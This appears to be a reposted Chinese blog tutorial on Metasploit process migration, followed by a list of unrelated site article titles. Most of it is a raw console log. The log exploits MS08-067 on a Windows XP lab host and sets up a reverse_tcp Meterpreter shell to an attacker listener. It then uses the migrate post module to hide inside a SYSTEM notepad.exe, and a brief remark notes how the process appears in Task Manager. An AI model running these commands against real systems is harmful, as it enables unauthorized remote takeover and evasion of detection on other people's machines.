metasploit迁移进程
来源:互联网 发布:057188158198 淘宝打来 编辑:程序博客网 时间:2024/05/20 06:31
msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set RHOST 192.168.1.142RHOST => 192.168.1.142msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(ms08_067_netapi) > set LHOST 192.168.1.11LHOST => 192.168.1.11msf exploit(ms08_067_netapi) > set TARGET 41TARGET => 41msf exploit(ms08_067_netapi) > exploit[*] Started reverse handler on 192.168.1.11:4444 [*] Attempting to trigger the vulnerability...[*] Sending stage (752128 bytes) to 192.168.1.142[*] Meterpreter session 2 opened (192.168.1.11:4444 -> 192.168.1.142:1083) at 2013-04-27 13:15:56 -0400meterpreter > psProcess List============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System x86 0 NT AUTHORITY\SYSTEM 264 704 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 436 704 VMwareService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMwareService.exe 564 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 636 564 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe 660 564 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe 704 660 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 716 660 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe 880 704 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe 924 704 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 1004 704 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe 1124 704 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1212 704 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe 1292 1536 conime.exe x86 0 ROOT-9743DD32E3\Administrator C:\WINDOWS\system32\conime.exe 1340 704 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe 1488 704 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe 1596 1536 explorer.exe x86 0 ROOT-9743DD32E3\Administrator C:\WINDOWS\Explorer.EXE 1672 704 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe 1700 1596 VMwareTray.exe x86 0 ROOT-9743DD32E3\Administrator C:\Program Files\VMware\VMware Tools\VMwareTray.exe 1708 1596 VMwareUser.exe x86 0 ROOT-9743DD32E3\Administrator C:\Program Files\VMware\VMware Tools\VMwareUser.exe 1772 1596 ctfmon.exe x86 0 ROOT-9743DD32E3\Administrator C:\WINDOWS\system32\ctfmon.exe 2024 1124 wscntfy.exe x86 0 ROOT-9743DD32E3\Administrator C:\WINDOWS\system32\wscntfy.exemeterpreter > run post/windows/manage/migrate[*] Running module against ROOT-9743DD32E3[*] Current server process: svchost.exe (1124)[*] Spawning notepad.exe process to migrate to[+] Migrating to 1612[+] Successfully migrated to process 1612meterpreter > psProcess List============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System x86 0 NT AUTHORITY\SYSTEM 264 704 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 436 704 VMwareService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMwareService.exe 564 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 636 564 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe 660 564 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe 704 660 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 716 660 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe 880 704 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe 924 704 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 1004 704 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe 1124 704 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1212 704 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe 1292 1536 conime.exe x86 0 ROOT-9743DD32E3\Administrator C:\WINDOWS\system32\conime.exe 1340 704 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe 1488 704 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe 1596 1536 explorer.exe x86 0 ROOT-9743DD32E3\Administrator C:\WINDOWS\Explorer.EXE 1612 1124 notepad.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\notepad.exe 1672 704 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe 1700 1596 VMwareTray.exe x86 0 ROOT-9743DD32E3\Administrator C:\Program Files\VMware\VMware Tools\VMwareTray.exe 1708 1596 VMwareUser.exe x86 0 ROOT-9743DD32E3\Administrator C:\Program Files\VMware\VMware Tools\VMwareUser.exe 1772 1596 ctfmon.exe x86 0 ROOT-9743DD32E3\Administrator C:\WINDOWS\system32\ctfmon.exe 2024 1124 wscntfy.exe x86 0 ROOT-9743DD32E3\Administrator C:\WINDOWS\system32\wscntfy.exemeterpreter >
迁移进程前,还没有notepad.exe这个进程,迁移后就有了。但是,XP上,只有通过任务管理器才能看到。
而通过管理员打开记事本,是这样的:
就是用户名不一样:SYSTEM和Administrator。
- metasploit迁移进程
- metasploit对IE进行渗透之高级选项及自动迁移进程
- 进程迁移
- 进程 线程 进程迁移
- Metasploit
- Metasploit
- Metasploit
- 分布式系统中的进程迁移
- meterpreter解释器-进程迁移
- 基于Linux 的进程迁移机制设计
- process migration(进程迁移) 学习笔记
- Metasploit使用说明
- HTTP METASPLOIT
- Metasploit Framework
- metasploit-unleashed
- Metasploit Support
- metasploit video
- metasploit vpn
- Effective C++ 学记之10 令operator=返回一个 reference to *this
- PHP变量的存储
- Ruby的操作符重载
- 美女导师的营销小故事
- C# delegate event关系
- metasploit迁移进程
- POJ 2187 Beauty Contest [凸包,旋转卡壳]
- tizen开发(2)
- 三星SDK的API翻译
- Android 客户端socket通讯
- Android onSaveInstanceState和onRestoreInstanceState触发的时机
- java线程
- CP15寄存器
- CKEDITOR动态设置的上传路径